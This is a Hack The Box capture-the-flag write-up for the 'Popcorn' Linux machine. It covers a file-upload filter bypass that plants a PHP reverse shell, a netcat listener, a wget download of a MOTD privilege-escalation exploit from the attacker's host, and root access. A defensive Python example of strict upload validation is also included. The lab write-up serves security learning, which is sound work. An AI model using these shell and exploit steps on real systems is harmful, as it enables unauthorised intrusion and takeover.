
Hack The Box - Popcorn Writeup


IP          OS     Difficulty  Release Date
10.10.10.6  Linux  Medium      15 March 2017

Enumeration

As with any machine on HackTheBox, the first step is to run an nmap scan to find open ports and running services.

nmap

kali@kali:~/Desktop/Popcorn:~$ nmap -sC -sV  10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 09:39 EDT

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.85 seconds

Working directory

While nmap is running we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command mkdir /home/kali/Desktop/Popcorn. Any commands on the local machine will be run from this directory unless stated otherwise.

HTTP

nmap revealed a web server on this box. Navigating to it in a web browser shows what looks like a default web server start page.

Gobuster

kali@kali:~/Desktop/Popcorn:~$ gobuster dir -u http://10.10.10.6 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.6
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/17 09:43:53 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index.html (Status: 200)
/test (Status: 200)
/torrent (Status: 301)
[ERROR] 2020/06/17 09:44:12 [!] Get http://10.10.10.6/server-status: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/06/17 09:44:12 Finished
===============================================================

Gobuster reveals the /test and /torrent directories.

/test

Navigating to /test/ reveals a blank page.

/torrent/

Navigating to /torrent/ reveals a web app named Torrent Hunter.


This web app looks like a platform for uploading, downloading and sharing .torrent files. Looking around the web app we can browse the torrent files currently on the platform. There is only one record, a Kali Linux torrent file. There is an upload torrent feature, but it requires registration. Registration appears to be open to the public.


Once registered, several attempts were made to upload a non-torrent file, but it seems the only file type allowed is a .torrent file.


After uploading the .torrent file you are able to view the record on the website. There is an option to upload screenshots. This states that only jpg, jpeg, gif and png files are allowed for upload.


Exploiting screenshot file upload (with BurpSuite)

Burp Suite will be used to modify the HTTP request of the file upload.

Get reverse shell script

Since the web app uses PHP as its server-side language, we need a PHP script to establish a reverse shell. There are several options for this, but in this box the web shell that ships with the standard Kali install will be used. It can be copied to the working directory with cp /usr/share/webshells/php/php-reverse-shell.php .

Configure the script

Once copied, the file needs to be edited to reflect our local machine's settings. Open php-reverse-shell.php in a text editor and change the IP address and port to your Kali IP address and a port of your choice.

Rename the script

To pass the file name check the script must be renamed first. The allowed file extensions are shown on the page, and changing the name to php-reverse-shell.png.php allows us to bypass this check. Files can be renamed easily using the mv command.

Open BurpSuite and proxy

To edit the request a BurpSuite proxy must be running to intercept traffic. This can be done simply by opening BurpSuite and setting our browser to proxy traffic through 127.0.0.1:8000.

Upload the script

With Burp now intercepting, the HTTP requests can be edited. Upload the file using the form and Burp should pop up into the foreground with a new request.

Edit the request


To get the script past any further file upload checks the Content-Type must be changed. Changing this line to Content-Type: image/png and pressing Forward will send the edited request on to the server.

If the upload has been successful the message below will show.

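The bypass above works because the upload only looks for an allowed extension somewhere in the name and trusts the client-supplied Content-Type. The following Python is an added illustration (not Torrent Hunter's code) contrasting that kind of naive check with a stricter one that validates the final extension, rejects double extensions, and verifies the file's magic bytes; the sample inputs are constructed.

```python
"""Added example: naive vs strict screenshot upload validation."""
import os
import re

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}

# Leading bytes each allowed image type must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}

# Constructed sample contents (not real files from the box).
PNG_SAMPLE = MAGIC["png"] + b"\x00" * 8
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"


def naive_check(filename: str, content_type: str) -> bool:
    """Weak check: any allowed extension appearing anywhere in the name plus
    an image/* Content-Type from the client is enough to accept the file."""
    has_allowed_ext = any(f".{ext}" in filename.lower() for ext in ALLOWED_EXTENSIONS)
    return has_allowed_ext and content_type.lower().startswith("image/")


def strict_check(filename: str, content_type: str, data: bytes) -> bool:
    """Strict check: the final extension must be allowed, the base name may not
    contain dots (no double extensions) or unusual characters, the declared
    type must match the extension, and the magic bytes must match too."""
    base, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lstrip(".").lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    if "." in base or not re.fullmatch(r"[A-Za-z0-9_-]+", base):
        return False
    expected_type = "image/jpeg" if ext in ("jpg", "jpeg") else f"image/{ext}"
    if content_type.lower() != expected_type:
        return False
    return data.startswith(MAGIC[ext])


if __name__ == "__main__":
    # The double-extension upload passes the naive check and fails the strict one.
    print(naive_check("php-reverse-shell.png.php", "image/png"))
    print(strict_check("php-reverse-shell.png.php", "image/png", PHP_SAMPLE))
```

Even with a strict validator, the upload directory should be served without script execution, since the Apache handler decides to run the file based on its name alone.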

Establish reverse shell

With the payload uploaded, a reverse shell can be established.

Open netcat listener

To receive the reverse shell netcat will be used. A listener can be opened with nc -nvlp 4455, changing the port number to the one used in the script.

Running payload

When navigating to the page that displays the torrent file, the uploaded screenshot is shown as a broken image. However, right-clicking the image and opening it in a new window requests the file directly, which runs the payload.

If successful the netcat listener should show the output below.

kali@kali:~$ nc -nvlp 4455
listening on [any] 1234 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.6] 55520
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 17:10:45 up 33 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$

Privilege escalation

With a shell now established as www-data, the user flag can be grabbed from the user's home folder. A method to escalate privileges further must now be found.

MOTD Exploit

In the user's home folder there is a MOTD file inside the .cache directory.

Looking on searchsploit reveals an exploit for this using CVE-2010-0832.

kali@kali:~/Desktop/Popcorn$ searchsploit MOTD
--------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                           |  Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)                       | linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)                       | linux/local/14339.sh
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion                                                | windows/dos/1235.c
--------------------------------------------------------------------------------------------------------- ---------------------------------

Copy the exploit

To quickly grab the exploit run searchsploit -m 14339.

Host the exploit

To get the exploit onto the target, a Python web server will be used to host the exploit file. This can be started by opening a terminal session in the working directory and running python3 -m http.server.

Download the exploit

On the reverse shell session run wget http://10.10.14.18:8000/14339.sh replacing the IP address with your local machine.

Set file permissions

To enable the script to execute run chmod +x 14339.sh

Run the exploit

Before the exploit can be run the shell session must be upgraded to full TTY. This can be done by several methods. A python one liner is used in this instance.

python -c "import pty; pty.spawn('/bin/bash');"

With a TTY session now running the exploit can be executed by simply running the file with ./14339.sh.

If successful, running whoami will reveal that the current session is running as root.

The root flag can be found in the /root folder.

Looking through the user's home folder

This post is licensed under CC BY 4.0 by the author.